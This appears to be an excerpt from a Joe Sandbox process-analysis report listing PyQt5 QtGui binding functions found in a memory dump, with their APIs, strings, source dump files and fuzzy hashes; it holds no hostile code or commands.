API String ID: 3879688271-1769826052
Opcode ID: a62525e175208b993106656bebcd152b6d81f03965ca9d73490bfc59c1ef7aa2
Instruction ID: 38ac79b9bf15218cd3dfaf3348efcb8ced68affc0623b754c3c53e831243a728
Opcode Fuzzy Hash: a62525e175208b993106656bebcd152b6d81f03965ca9d73490bfc59c1ef7aa2
Instruction Fuzzy Hash: B851A13A709B45C9DB508F29E8943AD33B8FB48B98F551136EA8D47B28EF38D954C700

Function 00007FFD8627ACE0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 105COMMON

Download Yara Rule

APIs

?advancesForGlyphIndexes@QRawFont@@QEBA?AV?$QVector@VQPointF@@@@AEBV?$QVector@I@@@Z.QT5GUI ref: 00007FFD8627AD66
?advancesForGlyphIndexes@QRawFont@@QEBA?AV?$QVector@VQPointF@@@@AEBV?$QVector@I@@V?$QFlags@W4LayoutFlag@QRawFont@@@@@Z.QT5GUI ref: 00007FFD8627AE47

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

BJ1J1, xrefs: 00007FFD8627ADCD
QRawFont, xrefs: 00007FFD8627AE9A
advancesForGlyphIndexes, xrefs: 00007FFD8627AE93
advancesForGlyphIndexes(self, glyphIndexes: Iterable[int]) -> List[QPointF]advancesForGlyphIndexes(self, glyphIndexes: Iterable[int], layoutFlags: Union[QRawFont.LayoutFlags, QRawFont.LayoutFlag]) -> List[QPointF], xrefs: 00007FFD8627AE88
BJ1, xrefs: 00007FFD8627AD0E

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Vector@$?advancesF@@@@Font@@GlyphIndexes@Point$Flag@Flags@Font@@@@@I@@@Layoutmalloc
String ID: BJ1$BJ1J1$QRawFont$advancesForGlyphIndexes$advancesForGlyphIndexes(self, glyphIndexes: Iterable[int]) -> List[QPointF]advancesForGlyphIndexes(self, glyphIndexes: Iterable[int], layoutFlags: Union[QRawFont.LayoutFlags, QRawFont.LayoutFlag]) -> List[QPointF]
API String ID: 1625877125-2802067167
Opcode ID: 9e3423f31a2f9d91b83290bac58d5d7780b9ca67740463bd0b13cb97543da6e0
Instruction ID: 4d44aedf2cb0ee7ff614d7a99969ca06678d2dd8134bdb727684c21fd4cfdc88
Opcode Fuzzy Hash: 9e3423f31a2f9d91b83290bac58d5d7780b9ca67740463bd0b13cb97543da6e0
Instruction Fuzzy Hash: F6511A76B09B558AEB408F65E8546ED77B4FB48BA8F041136EE4E53B28DF38D884C740

Function 00007FFD86292E90 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

?quadTo@QPainterPath@@QEAAXAEBVQPointF@@0@Z.QT5GUI ref: 00007FFD86292F25
?quadTo@QPainterPath@@QEAAXAEBVQPointF@@0@Z.QT5GUI ref: 00007FFD86293015

Strings

BJ1J1, xrefs: 00007FFD86292EB8
quadTo(self, ctrlPt: Union[QPointF, QPoint], endPt: Union[QPointF, QPoint])quadTo(self, ctrlPtx: float, ctrlPty: float, endPtx: float, endPty: float), xrefs: 00007FFD86293027
QPainterPath, xrefs: 00007FFD86293039
Bdddd, xrefs: 00007FFD86292F9E
quadTo, xrefs: 00007FFD86293032

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?quadF@@0@PainterPath@@Point
String ID: BJ1J1$Bdddd$QPainterPath$quadTo$quadTo(self, ctrlPt: Union[QPointF, QPoint], endPt: Union[QPointF, QPoint])quadTo(self, ctrlPtx: float, ctrlPty: float, endPtx: float, endPty: float)
API String ID: 3371354620-2208196556
Opcode ID: 47f3b6b89294ae131c75aaee067b2f8f994fdde6b4775e3b8815761c1645f5d8
Instruction ID: ece03aa54e497830f02261cb0b67291f53a140db96ed35acc3656d558845b556
Opcode Fuzzy Hash: 47f3b6b89294ae131c75aaee067b2f8f994fdde6b4775e3b8815761c1645f5d8
Instruction Fuzzy Hash: 2D51BF76609F45C9DB50CF29E8942ED33A8FB48B98F551236EA4E47B28EF38D954C700

Function 00007FFD862B2F60 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

PyTuple_Size.PYTHON3(?,?,?,?,?,00007FFD8628C1F7), ref: 00007FFD862B2F82
??0QPoint@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFD8628C1F7), ref: 00007FFD862B2FB5
PyTuple_Size.PYTHON3(?,?,?,?,?,00007FFD8628C1F7), ref: 00007FFD862B2FD4
PyTuple_GetItem.PYTHON3(?,?,?,?,?,00007FFD8628C1F7), ref: 00007FFD862B2FF5
PyTuple_Size.PYTHON3(?,?,?,?,?,00007FFD8628C1F7), ref: 00007FFD862B3050
PyErr_Format.PYTHON3(?,?,?,?,?,00007FFD8628C1F7), ref: 00007FFD862B30AA

Strings

each argument must be an instance of %s, xrefs: 00007FFD862B309D

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Tuple_$Size$Err_FormatItemPoint@@
String ID: each argument must be an instance of %s
API String ID: 283935049-2919427144
Opcode ID: ff655d4b4f02d8fc962e28ca158eb7f1835679635679889e9cf9e6d95fde6f4b
Instruction ID: 9270ba94595b9e1ecb4463066e8c103cece4e1a5aab6853b017693db83a51df9
Opcode Fuzzy Hash: ff655d4b4f02d8fc962e28ca158eb7f1835679635679889e9cf9e6d95fde6f4b
Instruction Fuzzy Hash: FE314D36B09B4186EA509B16E86967D67A0FB88FE0F094131DE9E43B64EF3CE845C700

Function 00007FFD862441F0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

??0QPixmap@@QEAA@XZ.QT5GUI ref: 00007FFD86244252
?find@QPixmapCache@@SA_NAEBVQString@@PEAVQPixmap@@@Z.QT5GUI ref: 00007FFD8624426A
??0QPixmap@@QEAA@XZ.QT5GUI ref: 00007FFD86244302
?find@QPixmapCache@@SA_NAEBVKey@1@PEAVQPixmap@@@Z.QT5GUI ref: 00007FFD8624431A

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

find(key: Optional[str]) -> QPixmapfind(key: QPixmapCache.Key) -> QPixmap, xrefs: 00007FFD8624435A
QPixmapCache, xrefs: 00007FFD8624436D
find, xrefs: 00007FFD86244366

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?find@Cache@@PixmapPixmap@@Pixmap@@@$Key@1@String@@malloc
String ID: QPixmapCache$find$find(key: Optional[str]) -> QPixmapfind(key: QPixmapCache.Key) -> QPixmap
API String ID: 3382619297-2261066163
Opcode ID: 96381bc2c87b2f3d1c2b3e5a1caf88b282896c8cb71b00e1347a037525a258ec
Instruction ID: 9749d3a18b7c15fd84329d163756b4c4866dbf05c4fbb0f3d78fa6f77d751fd7
Opcode Fuzzy Hash: 96381bc2c87b2f3d1c2b3e5a1caf88b282896c8cb71b00e1347a037525a258ec
Instruction Fuzzy Hash: 0C412975B0CB4682EB409F56E8687AD6760FB89FA4F484031DA4E47764DF3CE849C700

Function 00007FFD86274A60 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 84COMMON

Download Yara Rule

APIs

?setPageSize@QPdfWriter@@UEAAXW4PageSize@QPagedPaintDevice@@@Z.QT5GUI ref: 00007FFD86274AF9
?setPageSize@QPagedPaintDevice@@QEAA_NAEBVQPageSize@@@Z.QT5GUI ref: 00007FFD86274B82
PyBool_FromLong.PYTHON3 ref: 00007FFD86274B8B

Strings

BJ9, xrefs: 00007FFD86274B3C
setPageSize(self, size: QPagedPaintDevice.PageSize)setPageSize(self, pageSize: QPageSize) -> bool, xrefs: 00007FFD86274BA3
QPdfWriter, xrefs: 00007FFD86274BB6
setPageSize, xrefs: 00007FFD86274BAF

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Page$Size@$?setPagedPaint$Bool_Device@@Device@@@FromLongSize@@@Writer@@
String ID: BJ9$QPdfWriter$setPageSize$setPageSize(self, size: QPagedPaintDevice.PageSize)setPageSize(self, pageSize: QPageSize) -> bool
API String ID: 756810281-1806342747
Opcode ID: 52da1f846986d9e21c446674636b59c2f7ac7aa2b7bb235d93ba6828d0d585cd
Instruction ID: a4fbf16f8a8f0632823b5d27006cb4948bd914f0ce64bc62b344569925d3a98a
Opcode Fuzzy Hash: 52da1f846986d9e21c446674636b59c2f7ac7aa2b7bb235d93ba6828d0d585cd
Instruction Fuzzy Hash: EF41FB76B0CB4682EB408B59F4A46AE77A5FB84B94F540532DA8D03B34DF3CE955CB00

Function 00007FFD8623D000 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 82COMMON

Download Yara Rule

APIs

?removeColumns@QStandardItemModel@@UEAA_NHHAEBVQModelIndex@@@Z.QT5GUI ref: 00007FFD8623D12B
PyBool_FromLong.PYTHON3 ref: 00007FFD8623D134
PyBool_FromLong.PYTHON3 ref: 00007FFD8623D14F

Strings

removeColumns(self, column: int, count: int, parent: QModelIndex = QModelIndex()) -> bool, xrefs: 00007FFD8623D165
QStandardItemModel, xrefs: 00007FFD8623D17B
removeColumns, xrefs: 00007FFD8623D174
Bii|J9, xrefs: 00007FFD8623D0D4

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong$?removeColumns@Index@@@ItemModelModel@@Standard
String ID: Bii|J9$QStandardItemModel$removeColumns$removeColumns(self, column: int, count: int, parent: QModelIndex = QModelIndex()) -> bool
API String ID: 2208377717-3334172684
Opcode ID: 895aa3612fe323fced01d727262ef6eb3f05c8363dc08a209624bf58f2be75f7
Instruction ID: 5ae63b1fc23bdfc6a5b8f4c627f19cb0494055a29ec5f7a5d2fa63f6fe843ad8
Opcode Fuzzy Hash: 895aa3612fe323fced01d727262ef6eb3f05c8363dc08a209624bf58f2be75f7
Instruction Fuzzy Hash: DE411736709B8186E6608F15F4543AAB3A8FB84BA0F544236DADD03B68EF3CD559CB00

Function 00007FFD86238F90 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

?hasChildren@QStandardItemModel@@UEBA_NAEBVQModelIndex@@@Z.QT5GUI ref: 00007FFD8623908F
PyBool_FromLong.PYTHON3 ref: 00007FFD86239098
PyBool_FromLong.PYTHON3 ref: 00007FFD862390B3

Strings

hasChildren, xrefs: 00007FFD862390D5
B|J9, xrefs: 00007FFD86239044
hasChildren(self, parent: QModelIndex = QModelIndex()) -> bool, xrefs: 00007FFD862390C9
QStandardItemModel, xrefs: 00007FFD862390DC

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong$?hasChildren@Index@@@ItemModelModel@@Standard
String ID: B|J9$QStandardItemModel$hasChildren$hasChildren(self, parent: QModelIndex = QModelIndex()) -> bool
API String ID: 807586324-2586429496
Opcode ID: 35a52d6f40e4f60c7d302afa48658e540d39875940cea2d0c5d01cedbb2e3b75
Instruction ID: f7a97a56df752d64e9fc4ef140e251b06c15f80c20b62280fe6b239a991817e6
Opcode Fuzzy Hash: 35a52d6f40e4f60c7d302afa48658e540d39875940cea2d0c5d01cedbb2e3b75
Instruction Fuzzy Hash: 8F312C32B09B8586EA609F15F8543AE77A4FB84BA0F584236DADD07764EF3CE558C700

Function 00007FFD86242D00 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 69COMMON

Download Yara Rule

APIs

?appendRow@QStandardItemModel@@QEAAXAEBV?$QList@PEAVQStandardItem@@@@@Z.QT5GUI ref: 00007FFD86242D71
?appendRow@QStandardItemModel@@QEAAXPEAVQStandardItem@@@Z.QT5GUI ref: 00007FFD86242E13

Strings

BJ:, xrefs: 00007FFD86242DCB
appendRow(self, items: Iterable[QStandardItem])appendRow(self, aitem: Optional[QStandardItem]), xrefs: 00007FFD86242E25
appendRow, xrefs: 00007FFD86242E34
QStandardItemModel, xrefs: 00007FFD86242E3B
BJ3, xrefs: 00007FFD86242D16

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Standard$?appendItemModel@@Row@$Item@@@Item@@@@@List@
String ID: BJ3$BJ:$QStandardItemModel$appendRow$appendRow(self, items: Iterable[QStandardItem])appendRow(self, aitem: Optional[QStandardItem])
API String ID: 2992386043-4118089468
Opcode ID: 07a37b03be569a44a5dd68a975091114e6128cb597c959fdb1d5ddb3dff69757
Instruction ID: 145c4e966737e878ea4a4267ea6b7f279193038b515373830bb91368de865943
Opcode Fuzzy Hash: 07a37b03be569a44a5dd68a975091114e6128cb597c959fdb1d5ddb3dff69757
Instruction Fuzzy Hash: 87313476B08F46C1EB508F15E8986AE77A4FB98BA0F544132DA8D43324EF3CD888C700

Function 00007FFD8626CA70 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FFD8626CAEA
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFD8626CAFD
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD8626CB08

Strings

QTextListFormat, xrefs: 00007FFD8626CB67
setNumberPrefix, xrefs: 00007FFD8626CB60
BJ1, xrefs: 00007FFD8626CA85
setNumberPrefix(self, np: Optional[str]), xrefs: 00007FFD8626CB54

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
